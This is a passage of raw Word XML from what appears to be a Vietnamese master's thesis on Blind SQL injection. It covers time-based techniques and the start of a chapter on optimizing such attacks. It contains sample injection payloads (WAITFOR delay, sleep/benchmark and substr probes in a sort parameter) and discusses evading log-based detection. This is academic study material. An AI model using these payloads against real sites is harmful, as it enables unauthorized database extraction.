    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc tạo ra trễ trong câu truy vấn tùy thuộc vào loại DBMS được sử dụng. MS-SQL hỗ trợ câu lệnh WAITFOR để tạo ra thời gian trễ. Ví dụ sau sẽ tạo ra thời gian trễ 5 giây nếu user là sa: if (select user) = ‘sa’ waitfor delay ‘0:0:5’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với câu lệnh cơ bản này, kẻ tấn công thực hiện tùy biến để lấy thông tin tại nhiều trường hợp khác nhau. Tận dụng kỹ thuật liên quan đến Content-base đã trình bày ở trên, trả về phụ thuộc điều kiện, thay vì buộc ứng dụng trả về nội dung khác nhau, câu truy vấn buộc trả về thời gian trễ. Ví dụ sẽ xảy ra trễ khi ký tự đầu tiên là “A”:</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if ASCII(SUBSTRING(‘Admin’,1,1)) = 64 waitfor delay ‘0:0:5’</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>if ASCII(SUBSTRING(‘Admin’,1,1)) = 65 waitfor delay ‘0:0:5’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong MySQL có thể sử dụng hàm SLEEP để tạo ra độ trễ (tính theo miliseconds):  select if(user() like ‘root@%’, sleep(5000), ‘false’). Một lưu ý là đối với phiên bản 5.0.12 trở về trước, hàm SLEEP không được hỗ trợ. Một phương pháp thay thế là sử dụng hàm Benchmark, thực hiện một hành động lặp đi lặp lại. Việc yêu cầu DBMS thực hiện liên tục một tác vụ tốn nhiều thời gian (lấy mã SHA-1 chẳng hạn) có thể sử dụng để tạo độ trễ: select if(user() like ‘root@%’, benchmark(50000,sha1(‘test’)), ‘false’).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kỹ thuật Time-base cho phép lợi dụng để khai thác lấy thông tin trong CSDL. Kỹ thuật này cũng rất hữu ích trong việc xác định ứng dụng có mắc lỗi SQL injection hay không. Trong nhiều trường hợp, khi mà tất cả các dữ liệu trả về đều rất mờ, chưa rõ ràng thì phương pháp time-base là phương pháp hiệu</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> quả nhất để xác định khả năng mắc lỗi của ứng dụng. Việc theo dõi thời gian trả về cũng đơn giản hơn là theo dõi thay đổi trong nội dung dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong chương 1 lần lượt đã đi từ cơ bản của tấn công SQL injection, nguồn gốc, nguyên nhân lỗi cho đến các phương pháp, kỹ thuật được sử dụng để thực hiện tấn công khai thác CSDL. Đặc biệt nhấn mạnh tấn công Blind SQL injection với hai kỹ thuật chính là: Content-base và Time-base. Ngày nay, cùng với sự phát triển của các công nghệ phát triển ứng dụng web, các dạng lỗ hổng dạng non-blind không còn nhiều. Đa số các ứng dụng web nếu mắc lỗi SQL injection đều thuộc dạng blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="00E665FA" w:rsidRDefault="003F7098" w:rsidP="00E665FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tùy thuộc vào hoàn cảnh và điều kiện cụ thể có thể lựa chọn phương pháp tấn công phù hợp. Sang chương tiếp theo, luận văn sẽ đi sâu vào các kỹ thuật tối ưu tấn công Blind SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc459374326"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Chương 2: Các phương pháp tối ưu hóa tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc459374327"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Hạn chế của tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injections là một trong những kỹ thuật tấn công ứng dụng web nguy hiểm nhất. Với tất cả thông tin được lưu trữ trong cơ sở dữ liệu, gần như hoàn toàn có thể bị lấy ra thông qua các yêu cầ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">u HTTP. Nhiều công ty sử dụng các giải pháp như: Tường lửa ứng dụng web (Web Application Firewalls), các hệ thống phát hiện xâm nhập (Intrusion Detection/Prevention Systems) để phát hiện và ngăn chặn. Tuy nhiên, những giải pháp này hoàn toàn có thể bị vượt qua và phá vỡ. Trong hơn 15 năm qua, nhiều kỹ thuật tấn công, tối ưu đã được hoàn thiện để khai thác sâu lỗ hổng này. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong các ví dụ trên, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>luận văn đã cho</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy rằng: Để lấy được 1 ký tự, thuộc dạng có thể nhìn thấy được (printable) thì kẻ tấn công phải thực hiện 94 lần (94 ký tự dạng nhìn thấy được). Điều này sẽ dẫn đến hạn chế về mặt thời gian và băng thông. Nếu như ở các phương pháp non-blind trên, chỉ cần một yêu cầu có thể lấy được một chuỗi các ký tự (ví dụ như tên database có độ dài là 10 ký tự chẳng hạn), thì đối với phương pháp Blind SQL injection sẽ là tối đa: 94 x 10 = 940 lần gửi yêu cầu. Như vậy, chi phí để xác định sẽ lớn hơn rất nhiều, và dữ liệu càng lớn thì chi phí càng lớn. Chi phí ở đây bao gồm hai loại chính: Thời gian và băng thông. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254DE4" w:rsidRPr="00B02A8B" w:rsidRDefault="00254DE4" w:rsidP="004415A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thời gian: Mỗi yêu cầu sẽ cần phải một khoảng thời gian để thực hiện. Việc thực hiện nhiều yêu cầu liên tục sẽ cần nhiều thời gian hơn. Nếu như các phương pháp như error base hay union base thì chỉ cần 1 yêu cầu, giả sử hế</w:t>
      </w:r>
      <w:r w:rsidR="00B02A8B" w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t 1s, thì phương pháp Blind SQL injection cần khoảng 94s để lấy một ký tự, và 940s để lấy một chuỗi 10 ký tự, có nghĩa khoảng 15 phút. Chưa kể đến các yếu tố ngoại cảnh là khi truy vấn nhiều, thời gian để lấy một yêu cầu có thể tăng lên. Trong thực tế, đối với nhiều ứng dụng, thời gian để thực hiện một yêu cầu có thể lớn hơn 1s nhiều lần, có thể đến 1 phút.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02A8B" w:rsidRPr="005D3C52" w:rsidRDefault="004415A7" w:rsidP="004415A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Băng thông: Mỗi lần yêu cầu, sẽ tốn một khoảng băng thông để gửi yêu cầu, và băng thông để nhận yêu cầu. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Việc thực hiện nhiều yêu cầu liên tục sẽ cần nhiề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>u băng thông</w:t>
      </w:r>
      <w:r w:rsidRPr="00B02A8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hơn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Tương tự như ví dụ về thời gian, số lượng băng thông cũng sẽ bị tăng gấp lên 940 lần cho một chuỗi 10 ký tự. đương nhiên sự gia tăng về băng thông sẽ kéo theo sự gia tăng về thời gian, vì phải cần có thời gian để tải các thông tin về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một vấn đề khá</w:t>
      </w:r>
      <w:r w:rsidR="001F366C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> là, dù các hệ </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">thống tường lửa không thể chặn được hoàn toàn tất cả các cuộc tấn công, nhưng lại có tác dụng như một công cụ giám sát. Việc một đối tượng liên tục thực hiện các yêu cầu gần giống nhau, liên tục trong một khoảng thời gian dài hoàn toàn có thể gây ra sự chú ý đối với quản trị hệ thống. Một chuyên viên quản trị hệ thống hoàn toàn có thể nhìn ra sự bất bình thường này. </w:t>
      </w:r>
      <w:r w:rsidR="008F7562">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày nay, các công cụ phân tích log tự động như: ossec, snort dễ dàng phát hiện ra các mẫu tấn công để từ đó đưa ra cảnh báo. Do đó, nếu cuộc tấn công kéo dài quá lâu, hoàn toàn có thể bị phát hiện trước khi kịp lấy hết thông tin cần thiết. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A47EB" w:rsidRDefault="007A47EB" w:rsidP="007A47EB">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9567D6" wp14:editId="4ABD615F">
            <wp:extent cx="5906262" cy="2443276"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture 29" descr="5. access.log SQLi Found - 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ccess.log SQLi Found - GL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect t="13563" r="1102" b="9655"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5906262" cy="2443276"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A47EB" w:rsidRPr="007A47EB" w:rsidRDefault="007A47EB" w:rsidP="007A47EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc458436422"/>
      <w:r w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Access log của web server lưu thông tin về mã tấn công SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidR="0094116B" w:rsidRDefault="0094116B" w:rsidP="0094116B">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E4D512D" wp14:editId="5730191E">
            <wp:extent cx="5972175" cy="3279140"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="31" name="Picture 30" descr="sguilET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uilETrules.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="3279140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094116B" w:rsidRPr="0094116B" w:rsidRDefault="0094116B" w:rsidP="0094116B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc458436423"/>
      <w:r w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0094116B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Cảnh báo OSSEC về tấn công SQL injeciton</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Do đó, các kỹ thuật tấn công SQL injection cần phải được được tối ưu (optimized), giúp nâng cao xác suất thành công của cuộc tấn công. Lợi ích cơ bản của việc tối ưu hóa tấn công là giúp lấy dữ liệu trả về nhanh hơn, tiết kiệm thời gian, cũng như </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">giảm việc gây ra tắc nghẽn mạng, tránh bị phát hiện. Một trong những lý do cần phải tối ưu đó là tốc độ, giúp cắt giảm các yêu cầu, thời gian gửi yêu cầu không cần thiết.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong </w:t>
      </w:r>
      <w:r w:rsidR="00804310" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>phần</w:t>
      </w:r>
      <w:r w:rsidR="007A47EB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00804310" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tiếp theo</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, luận văn sẽ trình bày một số phương pháp tối ưu, và biến thể giúp nâng cao hiệu quả, tiết kiệm chi phí trong tấn công Blind SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc459374328"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Các phương pháp tối ưu hóa truyền thống</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Máy tính chỉ hiểu được các con số, đó là lý do tại sao bảng mã ASCII (American Standard Code for Information Interchange) được tạo ra. Mỗi mã ASCII là đại diện của một ký tự. Bất kỳ ký tự ASCII nào cũng được đại diện bởi 1 byte hoặc 8 bit, thường được gọi là 1 octet. Khi tấn công SQL injection, thông thường sẽ không thực hiện dò quét đầy đủ trong bảng mã ASCII, bởi vì không phải tất cả các ký tự sẽ có trong cơ sở dữ liệu. Chính vì thế, các cuộc tấn công chỉ tập trung vào các mã ASCII từ 32 đến 126, là một bộ 94 ký tự. Để biểu diễn bộ này thực tế chỉ cần 7 bit, bởi vì bit đầu tiên trong octet chắc chắn là 0. Bảng sau sẽ cho thấy rõ hơn về vấn đề này:</w:t>
      </w:r>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029"/>
        <w:gridCol w:w="3059"/>
        <w:gridCol w:w="3037"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135"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Decimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135"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Hexadecimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="313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Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52">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w:t>
            </w:r>
          </w:p>
        </w:tc>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135"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00000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52">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127</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135"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7F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135"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01111111</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong ví dụ tấn công ở chương 1, kẻ tấn công sẽ sử dụng phương pháp liên tục dùng các giá trị điều kiện để lấy ra được giá trị chính xác chữ cái đầu của giá trị tên</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> database. Cụ thể, kẻ tấn công lần lượt thử với toàn bộ các ký tự nhìn thấy được trong bảng mã ASCII: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?sort=if(substr(database,1,1)=’A’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?sort=if(substr(database,1,1)=’B’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>…..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?sort=if(substr(database,1,1)=’9’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong quá trình truy vấn, nếu kết quả trả về là đúng thì dừng lại. Trong bảng mã ASCII, có khoảng 94 ký tự nhìn thấy được, như vậy kẻ tấn công sẽ phải thực hiện gửi tối đa 94 yêu cầu cho một ký tự. Trên thế giới đã có nhiều kỹ thuật nhằm tối ưu hóa, giảm số lượng yêu cầu cần gửi xuống.</w:t>
      </w:r>
    </w:p>
